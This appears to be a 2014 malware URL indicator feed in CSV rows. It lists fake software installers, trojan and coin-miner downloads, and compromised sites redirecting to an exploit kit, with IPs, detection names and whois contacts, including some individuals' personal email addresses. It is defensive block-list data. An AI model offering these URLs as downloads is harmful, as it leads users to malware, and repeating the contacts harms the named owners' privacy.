+"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5738856/FLV_Media_Player.exe=0D=0Ahttp:/dl.softpzivrubajjui.net/n/3.0.26.2/10064255/HitmanPro.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5738856/FLV_Media_Player.exe=0D=0Ahttp:/dl.softpzivrubajjui.net/n/3.0.26.2/11799286/Opera.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 
+"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5785797/FLV_Media_Player.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26.2/5784498/FLV_Media_Player.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5785797/FLV_Media_Player.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26.2/11359629/Stream_Movies_Online.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/6068293/winrarfree.exe=0D=0Ahttp:/dl.softpzivrubajjui.net/n/3.0.26.2/11717749/Winzip.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11797512/FLV_Media_Player.exe=0D=0Ahttp:/redtubes.ru/FgoKDkRRURgRDB0bDVAcCwdTGBcSG1AMC1EZGwohBhMSQRgXEhshFxpD/audio/127974014/481402808/toca_toca_radio_edit.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/4924888/100-villancicos.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/12023961/microsofthesapmakinesi.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/4800574/sculptris.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/5436359/FLV_Media_Player.exe=0D=0Ahttp:/dl01.fabdmr.com/n/3.0.26/6498621/FLV_Media_Player.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 
+"2014/01/06_12:28","dl.downf468.com/n/3.0.26/187807/Utorrent.exe=0D=0Ahttp:/dl01.facdmr.com/n/3.0.26/4993202/Mediaget.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/2105371/AVS_Media_Player.exe=0D=0Ahttp:/dl01.faadmr.com/n/3.0.26/11822316/FLV_Media_Player.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/2094912/AVS_Media_Player.exe=0D=0Ahttp:/installsupdater.info/syshost.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/5738856/FLV_Media_Player.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26/3484691/SimTractor.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/2632028/AVS_Media_Player.exe=0D=0Ahttp:/download.multiinstall.com.br/a75e4b51a7dfadaa4b8a88436b76af41/Quadro_1600x1200.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/2105407/AVS_Media_Player.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26/4351718/Vlc_Media_Player.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/11813765/n0140.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 
+"2014/01/06_12:28","dl.downf468.com/n/3.0.26/2105407/AVS_Media_Player.exe=0D=0Ahttp:/tube-city.ru/1MjIzIaTk8/J0c/J0tvPzNnfyM6SzsmT29nI49jTy9LQ093Y48TR0OOPg9XYgQ=3D=3D/torrent/5387708/159507868/download.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/4351718/Vlc_Media_Player.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26/6708421/Ares.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/6068293/winrarfree.exe=0D=0Ahttp:/dl01.fabdmr.com/n/3.0.26/5034600/J_DOWNLOADER.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/11810098/n2018.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/2629037/manual-de-configuraci&;amp;oacute;n-del-putty.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/11853911/Adobe_PDF_Reader.exe=0D=0Ahttp:/dl.softpzivrubajjui.net/n/3.0.26.2/5565169/FLVMPlayer.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/11975718/ultrasurf13.03.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/4866666/macromedia-freehand.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 
+"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/6690540/minecraft1.5.2.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5983928/app.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11930758/File_installer.exe=0D=0Ahttp:/dl.downe468.com/n/3.0.26/11928104/Ares.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/4889139/the-hunter.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11930758/File_installer.exe=0D=0Ahttp:/dl.downf468.com/n/3.0.26/11893495/Update_Code_Generator.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5570947/mipony.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11930758/File_installer.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26/12091048/Skype.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11930758/File_installer.exe=0D=0Ahttp:/dl01.fabdmr.com/n/3.0.26/187807/Utorrent.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11930758/File_installer.exe=0D=0Ahttp:/dl.downf468.com/n/3.0.26/7088851/FLV_Media_Player.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 
+"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11810424/n5250.exeo:=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11706753/d0005.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/11810692/n5062.exeo:p/o:p=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11706811/psx0109.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11784924/p1232.exeo:=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11560994/d3dx9_31.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/3285684/lógica-y-teoría-de-conjuntos.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/4789537/setup.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/8311230/avast.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/4812448/pointagedheures.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 
+"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5347935/wondersharepdftoword.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/4790826/HandballChallenge.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11439286/msvcr100.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/3708/teamviewer.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11442660/d3dx9_43.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/6156061/¿dónde-está-carmen-sandiego?.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11812198/n4250.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11811219/n4911.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11970252/skype.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/6654650/alzip.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 
+"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/2836178/gambasalaegipcia.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11809923/n5574.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11707321/psx0026.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11706755/d0004.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/08_22:47","valouweeigenaren.nl/customers/billing/df367548-18.zip","46.235.47.28","srv047028.webreus.nl.","Trojan","-","34233","0","NL", +"2014/01/08_22:49","valouweeigenaren.nl/customers/cases/acc56-81-93.zip","46.235.47.28","srv047028.webreus.nl.","Trojan","-","34233","0","NL", +"2014/01/09_23:39","-","119.245.150.94/fF3krry.exe Trojan.Backdoor.RV","suntoy.jp.","-","-","2514","0","JP", +"2014/01/09_23:39","directxex.com/uploads/815597715.bot.exe Trojan.Agent","173.245.61.76","cf-173-245-61-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","news4cars.com/misc/uip/adobe_flash.exe Trojan.Agent","37.148.207.1","n1nlhg640c1640.shr.prod.ams1.secureserver.net.","-","-","26496","0","NL", +"2014/01/09_23:39","rocksresort.com.au/image/pdf.exe Trojan.Zbot","67.22.142.73","unknown.dal.cologlobal.com.","-","Joel Peterson / Visit whois.ausregistry.com.au for Web based WhoIs","12179","0","CA", +"2014/01/09_23:39","updo.nl/file/b24d1856.exe Trojan.Injector","149.210.134.83","149-210-134-83.colo.transip.net.","-","-","20857","0","NL", +"2014/01/09_23:39","directxex.com/uploads/1395655996.ss.exe Win32/AutoRun.IRCBot.JD","173.245.61.76","cf-173-245-61-76.cloudflare.com.","-","Registrar Abuse 
Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/144543902.rundll32.exe Trojan","173.245.61.76","cf-173-245-61-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/1552287385.igfxtray.exe Win32/CoinMiner.IS","173.245.60.76","cf-173-245-60-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/1576253022.miner.txt Win32/CoinMiner.IS","173.245.60.76","cf-173-245-60-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/2074531303.BIN.exe Win32/Napolar.A","173.245.60.76","cf-173-245-60-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/815597715.bot.exe Win32/Spy.Zbot.AAQ","173.245.60.76","cf-173-245-60-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/84937512.And.exe Win32/Injector.AUJQ","173.245.60.76","cf-173-245-60-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/939195944.newmine.exe MSIL/CoinMiner.AY","173.245.61.76","cf-173-245-61-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","ttb.tbddlw.com/download/request/51a9b7865f1c1eb81f000001/CtlLI2Yz?PubID=3457_2776&ClickID=3247011638 PUP.FakeJava","54.218.45.67","ec2-54-218-45-67.us-west-2.compute.amazonaws.com.","-","Registrant domains@tuguu.com","16509","0","US", +"2014/01/19_09:40","yumekin.com/inde.php","108.179.202.25","-","Trojan","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36351","0","US", +"2014/01/19_09:40","yumekin.com/inde.php?comercial@cohesp.com.br","108.179.202.25","-","Trojan","Registrar Abuse Contact 
abuse-contact@publicdomainregistry.com","36351","0","US", +"2014/01/22_14:39","-","221.132.37.26/sh","-","Linux malware","-","7643","0","VN", +"2014/02/07_09:50","keyways.pt/~keyways/1.html","94.23.79.17","cluster006.ovh.net.","Leads to exploit at jolygoestobeinvester.ru","KEYWAYS, CONSULTING, LDA / luis.m.nascimento@gmail.com","16276","0","FR", +"2014/02/07_10:24","www.lccl.org.uk/1.html","67.231.249.62","s62.EXCALIBURHOST.COM.","Leads to exploit at jolygoestobeinvester.ru","LONDON CORPORATE COLLEGE LTD. / -","40244","0","US", +"2014/02/07_10:27","nt-associates.com/1.html","213.171.218.52","server213-171-218-52.livedns.org.uk.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact domainabuse@tucows.com","15418","0","GB", +"2015/02/04_13:35","ads.wikipartes.com/all/test.php","31.192.210.88","server.yakanaydinlatma.com.tr.","redirects to exploit kit","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","51559","0","TR", +"2014/02/07_11:02","nestorconsulting.net/1.html","74.50.25.155","chaos.lunarbreeze.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact domainabuse@tucows.com","15244","0","US", +"2014/02/07_11:02","portraitphotographygroup.com/~lorijill/1.html","192.185.46.31","-","Leads to exploit at jolygoestobeinvester.ru","-","20013","0","US", +"2014/02/07_11:05","d1054130-28095.cp.blacknight.com/1.html","78.153.216.42","PEMLINWEB133.blacknight.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@blacknight.com","39122","0","IE", +"2014/02/07_11:30","-","91.99.102.154/1.html","91.99.102.154.parsonline.net.","Leads to exploit at jolygoestobeinvester.ru","-","16322","0","IR", +"2014/02/07_11:39","mylabsrl.com/1.html","46.28.6.113","-","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@serverplan.com","1267","0","IT", +"2014/02/07_12:01","tavuks.com/_vti_bin/1und1.php/","37.247.99.221","host-37-247-99-221.routergate.com.","Trojan","coskun ozek / 
jarnsaxa@gmail.com","43260","0","TR", +"2014/02/07_13:34","ozzysixsixsix.web.fc2.com/1.html","208.71.106.61","hps13.fc2.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact domainabuse@tucows.com","40263","0","US", +"2014/02/07_13:34","alisat.biz/1.html","211.43.212.39","linux39.gabia.com.","Leads to exploit at jolygoestobeinvester.ru","Nohsumi / nsm@kku.ac.kr","3786","0","KR", +"2014/02/07_13:34","109-204-26-16.netconnexion.managedbroadband.co.uk/1.html","109.204.26.16","109-204-26-16.netconnexion.managedbroadband.co.uk.","Leads to exploit at jolygoestobeinvester.ru","Griffin Information Systems LTD / -","20500","0","GB", +"2014/02/07_13:34","www.nothingcompares.co.uk/1.html","82.165.204.223","kundenserver.de.","Leads to exploit at jolygoestobeinvester.ru","Appleby Creamery / -","8560","0","DE", +"2014/02/07_13:34","ip-182-50-129-164.ip.secureserver.net/1.html","182.50.129.164","ip-182-50-129-164.ip.secureserver.net.","Leads to exploit at jolygoestobeinvester.ru","-","26496","0","SG", +"2014/02/07_13:34","users173.lolipop.jp/~lolipop.jp-204f9d446b7f9eb/1.html","210.157.22.62","users173.phy.lolipop.jp.","Leads to exploit at jolygoestobeinvester.ru","paperboy&co. 
/ jp@muumuu-domain.com","7506","0","JP", +"2014/02/07_13:47","alexandria90.etcserver.com/~psychica/1.html","50.23.98.194","alexandria90.etcserver.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@enom.com","36351","0","US", +"2014/02/07_13:47","-","42.96.151.54/1.html","-","Leads to exploit at jolygoestobeinvester.ru","-","37963","0","CN", +"2014/02/07_13:47","-","91.99.102.154/1.html","91.99.102.154.parsonline.net.","Leads to exploit at jolygoestobeinvester.ru","-","16322","0","IR", +"2014/02/07_14:04","nortonfire.co.uk/1.html","82.165.213.55","kundenserver.de.","Leads to exploit at jolygoestobeinvester.ru","Daniel Reeve / -","8560","0","DE", +"2014/02/07_14:21","hrdcvn.com.vn/1.html","123.30.184.132","vdc184-132.vmms.vn.","Leads to exploit at jolygoestobeinvester.ru","-","7643","0","VN", +"2014/02/07_14:31","finnhair.co.uk/1.html","208.123.212.48","wp03.yeg.alentus.net.","Leads to exploit at jolygoestobeinvester.ru","Nina Brazendale, P Percival and R Percival / -","25745","0","US", +"2014/02/07_14:56","advancetec.co.uk/1.html","212.48.68.157","atfx.atfx-systems.co.uk.","Leads to exploit at jolygoestobeinvester.ru","advance technologies / -","20738","0","GB", +"2014/02/07_15:13","tamilcm.com/1.html","67.227.152.196","windows2.india-to.net.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","32244","0","US", +"2014/02/07_15:22","noobgirls.com/pussy.php","107.161.144.14","pluffpass.com.","Trojan","Moniker Privacy Services / NOOBGIRLS.COM@monikerprivacy.net","36352","0","US", +"2014/02/07_15:22","noobgirls.com/pussy.exe","107.161.144.14","pluffpass.com.","Trojan","Moniker Privacy Services / NOOBGIRLS.COM@monikerprivacy.net","36352","0","US", +"2014/02/07_15:39","landisbaptist.com/1.html","67.210.126.85","lyra.lunarpages.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@web.com","15244","0","US", 
+"2014/02/07_16:49","www.3peaks.co.jp/1.html","211.19.24.235","usr235.g024.nabic.jp.","Leads to exploit at jolygoestobeinvester.ru","three@soho-net.ne.jp","23641","0","JP", +"2014/02/07_17:00","corroshield.estb.com.sg/1.html","203.125.76.84","ns2.e-dir.com.sg.","Leads to exploit at jolygoestobeinvester.ru","support@e-dir.com","3758","0","SG", +"2014/02/07_17:10","d1171912.cp.blacknight.com/1.html","78.153.215.53","-","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@blacknight.com","39122","0","IE", +"2014/02/07_17:10","phitenmy.com/1.html","202.190.181.149","149.128.181.190.202.in-addr.arpa.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","2042","0","MY", +"2014/02/07_17:15","marchen-toy.co.jp/1.html","111.68.244.2","marchen-toy.co.jp.","Leads to exploit at jolygoestobeinvester.ru","main@marchen-toy.co.jp","2914","0","JP", +"2014/02/07_17:20","salon77.co.uk/1.html","79.171.34.9","mail62.hostinguk.net.","Leads to exploit at jolygoestobeinvester.ru","Barry Everton / -","33968","0","GB", +"2014/02/07_17:35","divine.lunarbreeze.com/~xenoa3/1.html","216.227.215.8","divine.lunarbreeze.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact domainabuse@tucows.com","15244","0","US", +"2014/02/07_17:40","kadman.net/1.html","195.189.140.28","28.hosting-5.xtream.co.il.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9116","0","IL", +"2014/02/07_17:51","sysconcalibration.com/1.html","174.141.228.147","win11.hostingmantra.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","32613","0","US", +"2014/02/07_19:06","ip-182-50-129-181.ip.secureserver.net/~venkat/1.html","182.50.129.181","ip-182-50-129-181.ip.secureserver.net.","Leads to exploit at jolygoestobeinvester.ru","-","26496","0","SG", 
+"2014/02/07_19:06","treventuresonline.com/1.html","192.185.41.48","-","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@enom.com","20013","0","US", +"2014/02/10_13:58","miracema.rj.gov.br/counter.php","187.73.33.43","web101.f1.k8.com.br.","iFrame.Exploit (injected into compromised sites, e.g. www.plantes-sauvages.fr/fiche_lierre_terrestre.htm)","Sérgio Chiapetta Leal / schiapett@proderj.rj.gov.br","262672","0","BR", +"2014/02/10_13:58","signready.com/counter.php","50.87.146.115","50-87-146-115.unifiedlayer.com.","iFrame.Exploit","Registrar Abuse Contact abuse@1and1.com","46606","0","US", +"2014/02/10_15:44","vistatech.us/gangplanks/trysted.exe","192.185.24.77","ns227.websitewelcome.com.","Trojan.Muiref","Hamed Tafreshi / hamed@vistatech.us","20013","0","US", +"2014/02/10_15:44","batcoroadlinescorporation.com/concedes/diggers.exe","184.172.49.3","svr1.infowaveindia.com.","Trojan.Muiref","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36351","0","US", +"2014/02/11_02:45","updat120.clanteam.com","67.220.217.235","67-220-217-235.hosted.static.webnx.com.","Exploit","-","18450","0","US", +"2014/02/11_02:45","updat120.clanteam.com/ie7.htm","67.220.217.235","67-220-217-235.hosted.static.webnx.com.","Exploit","-","18450","0","US", +"2014/02/11_02:45","updat120.clanteam.com/ie8.htm","67.220.217.235","67-220-217-235.hosted.static.webnx.com.","Exploit","-","18450","0","US", +"2014/02/11_02:45","updat120.clanteam.com/calc","67.220.217.235","67-220-217-235.hosted.static.webnx.com.","Trojan","-","18450","0","US", +"2014/02/11_02:53","www.tvnews.or.kr/web/main.gif","210.205.6.203","-","Trojan","-","9318","0","KR", +"2014/02/11_02:56","www.tvnews.or.kr/web/view.html","210.205.6.203","-","Win32/Exploit.CVE-2013-3897.A","-","9318","0","KR", +"2014/02/11_02:56","www.tvnews.or.kr/web/menu.gif","210.205.6.203","-","Trojan","-","9318","0","KR", +"2014/04/09_07:44","id405441215-8305493831.h121h9.com/","146.185.235.8","-","Browser 
Ransomware","-","15626","0","RU", +"2014/02/12_11:08","dent-lux.com.pl/02-2014/bills/tr-264-365-11.zip","93.157.100.74","s47-www.ogicom.net.","Trojan","bok@domena.pl","57807","0","PL", +"2014/02/12_11:08","www.studiochiarelli.eu/02-2014/clients/order.3757.zip","195.110.124.133","opus.register.it.","Trojan","NOT DISCLOSED! / support@register.it","39729","0","IT", +"2014/02/12_11:08","www.toochattoo.com/fond-ecran-anime/chinois1.exe","88.190.253.247","pf7-web.online.net.","Trojan","Owner franck.duparc@wanadoo.fr","12322","0","FR", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/Miner.txt","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/jhProtominer.files","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/GPUMiner.files","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/03/06_17:46","onrio.com.br/site/Pdf/","187.1.140.30","web601.uni5.net.","Trojan","OnRio Serviços de Informática Ltda ME / onrio@onrio.com.br","28299","0","BR", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/CPUMiner.files","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/03/06_17:46","portalfiremasters.com.br/Fatura.Pdf.rar","189.112.170.155","155.128/25.170.112.189.in-addr.arpa.","Trojan","Alexandre Cavalcanti Duran / alexandre.duran@gmail.com","16735","0","BR", +"2014/02/14_23:35","www.divshare.com/direct/25151579-efd.mexx","208.100.16.103","app2.divshare.com.","Backdoor.Bot","-","32748","0","US", +"2014/02/14_23:35","-","94.23.62.190/calc.exe","ns206681.ovh.net.","Trojan.Agent.FSA74","-","16276","0","FR", 
